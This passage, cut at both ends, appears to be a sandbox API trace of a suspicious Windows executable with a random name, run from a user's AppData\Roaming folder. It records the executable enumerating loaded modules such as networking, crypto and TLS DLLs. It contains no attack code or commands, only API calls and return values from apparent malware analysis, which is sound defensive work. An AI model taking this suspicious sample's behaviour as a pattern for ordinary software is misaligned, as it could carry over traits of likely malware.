cb=0xc | out: lpmodinfo=0x23dd3cc*(lpBaseOfDll=0x65a10000, SizeOfImage=0x10000, EntryPoint=0x65a13820)) returned 1 [0141.081] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.082] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x65a10000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0141.083] CoTaskMemFree (pv=0x558e10) [0141.083] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.083] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x65a10000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")) returned 0x1f [0141.084] CoTaskMemFree (pv=0x558e10) [0141.084] GetModuleInformation (in: hProcess=0x628, hModule=0x73f30000, lpmodinfo=0x23df4d8, cb=0xc | out: lpmodinfo=0x23df4d8*(lpBaseOfDll=0x73f30000, SizeOfImage=0x5f000, EntryPoint=0x73f34af0)) returned 1 [0141.085] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.085] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x73f30000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="ws2_32.dll") returned 0xa [0141.086] CoTaskMemFree (pv=0x558e10) [0141.086] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.086] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x73f30000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")) returned 0x1e [0141.087] CoTaskMemFree (pv=0x558e10) [0141.087] GetModuleInformation (in: hProcess=0x628, hModule=0x71400000, lpmodinfo=0x23e15e4, cb=0xc | out: lpmodinfo=0x23e15e4*(lpBaseOfDll=0x71400000, SizeOfImage=0x4f000, EntryPoint=0x7140d850)) returned 1 [0141.092] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.092] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x71400000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0141.094] CoTaskMemFree (pv=0x558e10) [0141.094] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.094] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x71400000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")) returned 0x1f [0141.095] CoTaskMemFree (pv=0x558e10) [0141.095] GetModuleInformation (in: hProcess=0x628, hModule=0x71450000, lpmodinfo=0x23e36f0, cb=0xc | out: lpmodinfo=0x23e36f0*(lpBaseOfDll=0x71450000, SizeOfImage=0x9b000, EntryPoint=0x7148f7e0)) returned 1 [0141.096] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.096] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x71450000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="winhttp.dll") returned 0xb [0141.097] CoTaskMemFree (pv=0x558e10) [0141.097] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.097] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x71450000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")) returned 0x1f [0141.098] CoTaskMemFree (pv=0x558e10) [0141.098] GetModuleInformation (in: hProcess=0x628, hModule=0x71520000, lpmodinfo=0x23e57fc, cb=0xc | out: lpmodinfo=0x23e57fc*(lpBaseOfDll=0x71520000, SizeOfImage=0x12000, EntryPoint=0x71524510)) returned 1 [0141.099] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.100] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x71520000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="ondemandconnroutehelper.dll") returned 0x1b [0141.100] CoTaskMemFree (pv=0x558e10) [0141.101] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.101] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x71520000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")) returned 0x2f [0141.102] CoTaskMemFree (pv=0x558e10) [0141.102] GetModuleInformation (in: hProcess=0x628, hModule=0x714f0000, lpmodinfo=0x23e7948, cb=0xc | out: lpmodinfo=0x23e7948*(lpBaseOfDll=0x714f0000, SizeOfImage=0x2f000, EntryPoint=0x714fbb70)) returned 1 [0141.103] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.103] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x714f0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0141.105] CoTaskMemFree (pv=0x558e10) [0141.105] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.106] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x714f0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")) returned 0x20 [0141.107] CoTaskMemFree (pv=0x558e10) [0141.107] GetModuleInformation (in: hProcess=0x628, hModule=0x76900000, lpmodinfo=0x23e9a5c, cb=0xc | out: lpmodinfo=0x23e9a5c*(lpBaseOfDll=0x76900000, SizeOfImage=0x7000, EntryPoint=0x76901e10)) returned 1 [0141.108] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.108] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x76900000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0141.109] CoTaskMemFree (pv=0x558e10) [0141.109] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.109] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x76900000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NSI.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")) returned 0x1b [0141.110] CoTaskMemFree (pv=0x558e10) [0141.110] GetModuleInformation (in: hProcess=0x628, hModule=0x6a860000, lpmodinfo=0x23ebb58, cb=0xc | out: lpmodinfo=0x23ebb58*(lpBaseOfDll=0x6a860000, SizeOfImage=0x13000, EntryPoint=0x6a8625d0)) returned 1 [0141.111] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.111] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6a860000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0141.113] CoTaskMemFree (pv=0x558e10) [0141.113] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.113] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6a860000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll")) returned 0x21 [0141.114] CoTaskMemFree (pv=0x558e10) [0141.114] GetModuleInformation (in: hProcess=0x628, hModule=0x6a840000, lpmodinfo=0x23edc6c, cb=0xc | out: lpmodinfo=0x23edc6c*(lpBaseOfDll=0x6a840000, SizeOfImage=0x14000, EntryPoint=0x6a843c10)) returned 1 [0141.115] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.115] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6a840000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0141.116] CoTaskMemFree (pv=0x558e10) [0141.116] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.116] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6a840000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll")) returned 0x20 [0141.118] CoTaskMemFree (pv=0x558e10) [0141.118] GetModuleInformation (in: hProcess=0x628, hModule=0x74eb0000, lpmodinfo=0x23efd80, cb=0xc | out: lpmodinfo=0x23efd80*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0141.122] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.122] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x74eb0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0141.124] CoTaskMemFree (pv=0x558e10) [0141.124] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.124] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x74eb0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0141.125] CoTaskMemFree (pv=0x558e10) [0141.125] GetModuleInformation (in: hProcess=0x628, hModule=0x76800000, lpmodinfo=0x23f1e8c, cb=0xc | out: lpmodinfo=0x23f1e8c*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0141.127] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.127] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x76800000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0141.128] CoTaskMemFree (pv=0x558e10) [0141.128] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.128] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x76800000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0141.129] CoTaskMemFree (pv=0x558e10) [0141.129] GetModuleInformation (in: hProcess=0x628, hModule=0x745b0000, lpmodinfo=0x23f3fa0, cb=0xc | out: lpmodinfo=0x23f3fa0*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0141.131] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.131] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x745b0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0141.132] CoTaskMemFree (pv=0x558e10) [0141.132] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.132] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x745b0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0141.133] CoTaskMemFree (pv=0x558e10) [0141.133] GetModuleInformation (in: hProcess=0x628, hModule=0x74520000, lpmodinfo=0x23f60cc, cb=0xc | out: lpmodinfo=0x23f60cc*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0141.190] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.190] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x74520000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0141.191] CoTaskMemFree (pv=0x558e10) [0141.192] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.192] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x74520000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0141.193] CoTaskMemFree (pv=0x558e10) [0141.193] GetModuleInformation (in: hProcess=0x628, hModule=0x76470000, lpmodinfo=0x23f81d8, cb=0xc | out: lpmodinfo=0x23f81d8*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0141.195] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.195] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x76470000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0141.196] CoTaskMemFree (pv=0x558e10) [0141.196] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.196] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x76470000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0141.200] CoTaskMemFree (pv=0x558e10) [0141.201] GetModuleInformation (in: hProcess=0x628, hModule=0x73f20000, lpmodinfo=0x23fa2ec, cb=0xc | out: lpmodinfo=0x23fa2ec*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0141.202] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.202] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x73f20000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0141.204] CoTaskMemFree (pv=0x558e10) [0141.204] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.204] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x73f20000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0141.205] CoTaskMemFree (pv=0x558e10) [0141.205] GetModuleInformation (in: hProcess=0x628, hModule=0x70a50000, lpmodinfo=0x23fc3f8, cb=0xc | out: lpmodinfo=0x23fc3f8*(lpBaseOfDll=0x70a50000, SizeOfImage=0x84000, EntryPoint=0x70a76530)) returned 1 [0141.207] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.207] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x70a50000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0141.208] CoTaskMemFree (pv=0x558e10) [0141.208] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.208] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x70a50000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\DNSAPI.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")) returned 0x1e [0141.210] CoTaskMemFree (pv=0x558e10) [0141.210] GetModuleInformation (in: hProcess=0x628, hModule=0x713f0000, lpmodinfo=0x23fe504, cb=0xc | out: lpmodinfo=0x23fe504*(lpBaseOfDll=0x713f0000, SizeOfImage=0x8000, EntryPoint=0x713f1fc0)) returned 1 [0141.211] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.211] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x713f0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0141.212] CoTaskMemFree (pv=0x558e10) [0141.216] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.216] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x713f0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\WINNSI.DLL" (normalized: "c:\\windows\\syswow64\\winnsi.dll")) returned 0x1e [0141.217] CoTaskMemFree (pv=0x558e10) [0141.217] GetModuleInformation (in: hProcess=0x628, hModule=0x6fa30000, lpmodinfo=0x2400610, cb=0xc | out: lpmodinfo=0x2400610*(lpBaseOfDll=0x6fa30000, SizeOfImage=0x8000, EntryPoint=0x6fa31920)) returned 1 [0141.219] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.219] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6fa30000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0141.220] CoTaskMemFree (pv=0x558e10) [0141.220] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.220] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6fa30000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")) returned 0x20 [0141.222] CoTaskMemFree (pv=0x558e10) [0141.222] GetModuleInformation (in: hProcess=0x628, hModule=0x6f9e0000, lpmodinfo=0x2402724, cb=0xc | out: lpmodinfo=0x2402724*(lpBaseOfDll=0x6f9e0000, SizeOfImage=0x47000, EntryPoint=0x6f9f58d0)) returned 1 [0141.224] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.224] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6f9e0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0141.225] CoTaskMemFree (pv=0x558e10) [0141.225] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.225] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6f9e0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")) returned 0x20 [0141.227] CoTaskMemFree (pv=0x558e10) [0141.227] GetModuleInformation (in: hProcess=0x628, hModule=0x71540000, lpmodinfo=0x2404838, cb=0xc | out: lpmodinfo=0x2404838*(lpBaseOfDll=0x71540000, SizeOfImage=0x1b000, EntryPoint=0x71549050)) returned 1 [0141.230] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.230] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x71540000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0141.232] CoTaskMemFree (pv=0x558e10) [0141.232] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.232] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x71540000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0141.233] CoTaskMemFree (pv=0x558e10) [0141.233] GetModuleInformation (in: hProcess=0x628, hModule=0x6fdf0000, lpmodinfo=0x2406944, cb=0xc | out: lpmodinfo=0x2406944*(lpBaseOfDll=0x6fdf0000, SizeOfImage=0xa000, EntryPoint=0x6fdf3200)) returned 1 [0141.234] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.234] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6fdf0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0141.236] CoTaskMemFree (pv=0x558e10) [0141.236] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.236] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6fdf0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")) returned 0x1f [0141.237] CoTaskMemFree (pv=0x558e10) [0141.237] GetModuleInformation (in: hProcess=0x628, hModule=0x6f970000, lpmodinfo=0x2408a50, cb=0xc | out: lpmodinfo=0x2408a50*(lpBaseOfDll=0x6f970000, SizeOfImage=0x64000, EntryPoint=0x6f98afd0)) returned 1 [0141.239] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.239] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6f970000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="schannel.dll") returned 0xc [0141.240] CoTaskMemFree (pv=0x558e10) [0141.240] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.240] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6f970000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")) returned 0x20 [0141.242] CoTaskMemFree (pv=0x558e10) [0141.242] GetModuleInformation (in: hProcess=0x628, hModule=0x73f90000, lpmodinfo=0x240ab64, cb=0xc | out: lpmodinfo=0x240ab64*(lpBaseOfDll=0x73f90000, SizeOfImage=0x178000, EntryPoint=0x73fe8a90)) returned 1 [0141.243] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.243] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x73f90000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0141.248] CoTaskMemFree (pv=0x558e10) [0141.248] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.248] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x73f90000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPT32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")) returned 0x1f [0141.250] CoTaskMemFree (pv=0x558e10) [0141.250] GetModuleInformation (in: hProcess=0x628, hModule=0x764c0000, lpmodinfo=0x240cc70, cb=0xc | out: lpmodinfo=0x240cc70*(lpBaseOfDll=0x764c0000, SizeOfImage=0xe000, EntryPoint=0x764c5410)) returned 1 [0141.251] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.251] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x764c0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0141.252] CoTaskMemFree (pv=0x558e10) [0141.252] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.252] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x764c0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSASN1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")) returned 0x1e [0141.253] CoTaskMemFree (pv=0x558e10) [0141.254] GetModuleInformation (in: hProcess=0x628, hModule=0x6f960000, lpmodinfo=0x240ed7c, cb=0xc | out: lpmodinfo=0x240ed7c*(lpBaseOfDll=0x6f960000, SizeOfImage=0x10000, EntryPoint=0x6f964600)) returned 1 [0141.255] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.255] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6f960000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="mskeyprotect.dll") returned 0x10 [0141.256] CoTaskMemFree (pv=0x558e10) [0141.257] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.257] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6f960000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")) returned 0x24 [0141.259] CoTaskMemFree (pv=0x558e10) [0141.259] GetModuleInformation (in: hProcess=0x628, hModule=0x6f940000, lpmodinfo=0x24110ac, cb=0xc | out: lpmodinfo=0x24110ac*(lpBaseOfDll=0x6f940000, SizeOfImage=0x20000, EntryPoint=0x6f94d120)) returned 1 [0141.262] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.262] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6f940000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="ncrypt.dll") returned 0xa [0141.265] CoTaskMemFree (pv=0x558e10) [0141.265] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.265] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6f940000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")) returned 0x1e [0141.266] CoTaskMemFree (pv=0x558e10) [0141.266] GetModuleInformation (in: hProcess=0x628, hModule=0x6f910000, lpmodinfo=0x24131b8, cb=0xc | out: lpmodinfo=0x24131b8*(lpBaseOfDll=0x6f910000, SizeOfImage=0x2c000, EntryPoint=0x6f92bb10)) returned 1 [0141.267] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.267] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6f910000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="NTASN1.dll") returned 0xa [0141.270] CoTaskMemFree (pv=0x558e10) [0141.270] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.270] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6f910000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NTASN1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")) returned 0x1e [0141.272] CoTaskMemFree (pv=0x558e10) [0141.272] GetModuleInformation (in: hProcess=0x628, hModule=0x6f8f0000, lpmodinfo=0x24152c4, cb=0xc | out: lpmodinfo=0x24152c4*(lpBaseOfDll=0x6f8f0000, SizeOfImage=0x1a000, EntryPoint=0x6f8ffa70)) returned 1 [0141.274] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.274] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6f8f0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="ncryptsslp.dll") returned 0xe [0141.279] CoTaskMemFree (pv=0x558e10) [0141.279] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0141.279] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6f8f0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")) returned 0x22 [0141.281] CoTaskMemFree (pv=0x558e10) [0141.281] CloseHandle (hObject=0x628) returned 1 [0141.671] GetCurrentProcessId () returned 0xbb4 [0141.671] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x2a0 [0141.672] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x232b610, cb=0x100, lpcbNeeded=0x19e600 | out: lphModule=0x232b610, lpcbNeeded=0x19e600) returned 1 [0141.673] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x232b71c, cb=0x200, lpcbNeeded=0x19e600 | out: lphModule=0x232b71c, lpcbNeeded=0x19e600) returned 1 [0141.674] GetModuleInformation (in: hProcess=0x2a0, hModule=0x400000, lpmodinfo=0x232b95c, cb=0xc | out: lpmodinfo=0x232b95c*(lpBaseOfDll=0x400000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0141.674] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.674] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x400000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") returned 0x3a [0141.674] CoTaskMemFree (pv=0x55ab38) [0141.675] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.675] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x400000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe")) returned 0x60 [0141.675] CoTaskMemFree (pv=0x55ab38) [0141.675] GetModuleInformation (in: hProcess=0x2a0, hModule=0x771d0000, lpmodinfo=0x232db68, cb=0xc | out: lpmodinfo=0x232db68*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0141.675] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.675] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x771d0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0141.675] CoTaskMemFree (pv=0x55ab38) [0141.675] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.675] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x771d0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0141.675] CoTaskMemFree (pv=0x55ab38) [0141.675] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f850000, lpmodinfo=0x232fc6c, cb=0xc | out: lpmodinfo=0x232fc6c*(lpBaseOfDll=0x6f850000, SizeOfImage=0x59000, EntryPoint=0x6f860780)) returned 1 [0141.676] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.676] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f850000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0141.676] CoTaskMemFree (pv=0x55ab38) [0141.676] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.676] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f850000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0141.676] CoTaskMemFree (pv=0x55ab38) [0141.676] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76720000, lpmodinfo=0x2331d78, cb=0xc | out: lpmodinfo=0x2331d78*(lpBaseOfDll=0x76720000, 